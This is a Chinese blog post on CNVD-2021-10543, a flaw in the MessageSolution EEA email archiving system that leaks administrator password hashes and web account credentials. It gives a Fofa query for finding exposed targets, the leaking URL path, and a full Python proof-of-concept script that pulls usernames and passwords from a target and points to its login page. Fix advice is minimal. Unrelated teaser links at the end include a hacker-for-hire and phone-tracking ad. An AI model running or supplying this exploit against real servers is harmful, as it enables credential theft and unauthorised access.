(CNVD-2021-10543)|MessageSolution 企业邮件归档管理系统 EEA 存...

访客4年前黑客文章939

0x01 漏洞说明

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码。

0x02?影响版本

  • MessageSolution Enterprise Email Archiving (EEA)

0x03?漏洞复现

Fofa搜索标题:(注意:互联网的非授权利用属于违法行为)

1616388109_6058200de451706f28aaa.png!small?1616388110296

MessageSolution企业邮件归档管理系统首页为这样:1616389048_605823b81b91dae6697ed.png!small?1616389055602

访问URL查看泄漏的hash和web账号密码:

http://xxx.xxx.xxx/authenticationserverservlet/

1616389205_605824558594c07be7540.png!small?1616389205976

获取到账号、密码后即可访问url进行登录:

https://xxx.xxx.xxx.xxx/indexcommon.jsp

1616388970_6058236a382651adf84ae.png!small?1616388970881

脚本POC:

# CNVD-2021-10543
# MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
# fofa: title="MessageSolution"

import requests
import time
import json
from bs4 import BeautifulSoup
# 忽略SSL证书校验提醒
requests.packages.urllib3.disable_warnings()

def title():
    print("+-------------------------------------------------+")
    print("+-----------    CNVD-2021-10543   ----------------+")
    print("+----------- MessageSolution信息泄漏 --------------+")
    print('+--------- Fofa: title="MessageSolution" ---------+')
    print("+--------  use: python3 CNVD-2021-10543.py -------+")
    print("+-------------------------------------------------+")

def target_url(url):
    target_url=url + "/authenticationserverservlet/"
    login_url=url + "/indexcommon.jsp"
    # verify=False 忽略SSL证书校验
    try:
        res=requests.get(url=target_url, verify=False,timeout=5)
        if "administrator" in res.text and res.status_code==200:
            print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
            time.sleep(1)
            print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
            bs_xml=BeautifulSoup(res.text,features="html.parser")
            user_names=bs_xml.findAll('username')
            passwords=bs_xml.findAll('password')
            i=1
            print(f"[!] \033[31m获取到目标系统信息:\033[0m")
            if i < len(user_names):
                for user_name,password  in user_names,passwords:
                    print(f"   用户名: {user_name.text}    密 码: {password.text}")
                    i=i+1
            else:
                print(f"   用户名: {user_names[0].text}
   密 码: {passwords[0].text}")
            print(f"\033[32m[0] 请访问: {login_url} 进行登录!")
        else:
            print(f"[0]  \033[32m目标系统: {url} 不存在信息泄\033[0m")
    except Exception as e:
        print(f"[!]  目标系统: {url} 出现意外错误:
 {e}")




if __name__=="__main__":
    title()
    url=str(input("[0] 请输入目标站点URL:
"))
    target_url(url)

0x04?修复建议

厂商暂未给出修复建议?。

建议用户将该系统放置在内网,不要暴露在互联网,同时禁止未授权访问相关文件?。


结束语

本文章仅用于交流学习,请勿使用该漏洞进行违法活动。

https://github.com/Henry4E36/CNVD-2021-10543

相关文章

Google Play将换新装 中国版或采取独立账户

近期,有关Google重回我国市场的信息持续。日前,Google內部人员表露了Google入新桥信息:即将来临的中文版Goolg Play的账户和海外版很有可能不相通,中文版Goolg Play将采用...

农村快递最后一公里的解决方式,已经有人想出来,并且落地了

农村快递最后一公里的解决方式,已经有人想出来,并且落地了

乡镇上取快递,额外收费2元。 在农村,我们去镇上取快递的时候,很多人都遇到过这种额外收费的情况。对于取件额外收费2元这种现象,取件的我们很无语,快递方也很无奈。 从乡村到镇上取快递,被额外收取...

求黑客联系方式_输入对方手机号码直接定位

uc网盘公布将要关掉 uc网盘粗壮事将要终止服务项目。3月17日信息 前不久互联网线上存储产品,也就是百度云盘连续“出事了”,而今日,UC网盘忽然释放公示,表明将要中止百度云盘出示的关键服务项目。哎又...

聊天监控,找黑客办事是犯法律责任的吗,找黑客先盗号后给钱

ASP+Access的安全危险ASP+Access解决计划的首要安全危险来自Access数据库的安全性,其次在于ASP网页规划过程中的安全漏洞。 然后慢慢跑啊慢慢跑,半途还去洗了个澡..最终跑出来一切...

长治文明小博客(全国十大文明城市长治)

长治文明小博客(全国十大文明城市长治)

襄垣新闻视频截图 调研组深入襄垣县新时代文明实践中心进行实地调研,详细了解了襄垣县新时代文明实践中心建设思路、平台建设、队伍建设、供需对接、运行效果、保障措施等情况。 襄垣新闻视频截图...

htc手机怎么样(台湾htc手机怎么样)

htc手机怎么样(台湾htc手机怎么样)

HTC是曾经安卓机皇,但在几年之前就已经开始没落。但HTC在旗舰机的定价上,却一直没有放下身段。比如去年5月发布一款HTC旗舰机HTC U11,采用骁龙835处理器,4+64GB定价4599元,6+1...